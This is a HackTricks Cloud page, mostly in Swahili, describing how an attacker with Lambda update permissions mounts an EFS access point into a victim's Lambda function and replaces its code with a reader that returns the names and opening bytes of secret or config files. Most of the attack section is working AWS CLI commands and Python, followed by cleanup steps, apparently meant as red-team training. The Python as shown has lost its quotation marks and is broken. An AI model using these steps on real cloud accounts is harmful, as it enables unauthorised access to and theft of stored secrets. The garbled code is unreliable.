AWS Lambda – EFS Mount Injection via UpdateFunctionConfiguration (Uibi wa Data)

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Tumia vibaya lambda:UpdateFunctionConfiguration kuambatanisha EFS Access Point iliyopo kwenye Lambda, kisha weka code rahisi inayoorodhesha/inasoma files kutoka kwenye path iliyopachikwa ili exfiltrate shared secrets/config ambayo function haikuweza kufikia kabla.

Requirements

Permissions on the victim account/principal:
lambda:GetFunctionConfiguration
lambda:ListFunctions (to find functions)
lambda:UpdateFunctionConfiguration
lambda:UpdateFunctionCode
lambda:InvokeFunction
efs:DescribeMountTargets (to confirm mount targets exist)
Environment assumptions:
Target Lambda is VPC-enabled and its subnets/SGs can reach the EFS mount target SG over TCP/2049 (e.g. role has AWSLambdaVPCAccessExecutionRole and VPC routing allows it).
The EFS Access Point is in the same VPC and has mount targets in the AZs of the Lambda subnets.

Attack

Variables

REGION=us-east-1
TARGET_FN=<target-lambda-name>
EFS_AP_ARN=<efs-access-point-arn>

Ambatanisha EFS Access Point kwa Lambda

aws lambda update-function-configuration \
--function-name $TARGET_FN \
--file-system-configs Arn=$EFS_AP_ARN,LocalMountPath=/mnt/ht \
--region $REGION
# wait until LastUpdateStatus == Successful
until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done

Andika upya code kwa kisomaji rahisi kinachoorodhesha faili na kuangalia (peek) bytes 200 za mwanzo za faili inayoweza kuwa secret/config.

cat > reader.py <<PY
import os, json
BASE=/mnt/ht

def lambda_handler(e, c):
out={ls:[],peek:None}
try:
for root, dirs, files in os.walk(BASE):
for f in files:
p=os.path.join(root,f)
out[ls].append(p)
cand = next((p for p in out[ls] if secret in p.lower() or config in p.lower()), None)
if cand:
with open(cand,rb) as fh:
out[peek] = fh.read(200).decode(utf-8,ignore)
except Exception as ex:
out[err]=str(ex)
return out
PY
zip reader.zip reader.py
aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://reader.zip --region $REGION
# If the original handler was different, set it to reader.lambda_handler
aws lambda update-function-configuration --function-name $TARGET_FN --handler reader.lambda_handler --region $REGION
until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done

Iitisha na upate data

aws lambda invoke --function-name $TARGET_FN /tmp/efs-out.json --region $REGION >/dev/null
cat /tmp/efs-out.json

Matokeo yanapaswa kujumuisha orodha ya saraka chini ya /mnt/ht na onyesho fupi la faili ya siri/usanidi iliyochaguliwa kutoka EFS.

Athari

Mshambuliaji mwenye ruhusa zilizoorodheshwa anaweza ku-mount EFS Access Points yoyote ndani ya in-VPC katika Lambda functions za mwathiriwa ili kusoma na kupeleka nje usanidi uliohifadhiwa pamoja na siri kwenye EFS ambazo hapo awali zilikuwa hazipatikani kwa function hiyo.

Usafishaji

aws lambda update-function-configuration --function-name $TARGET_FN --file-system-configs [] --region $REGION || true

tip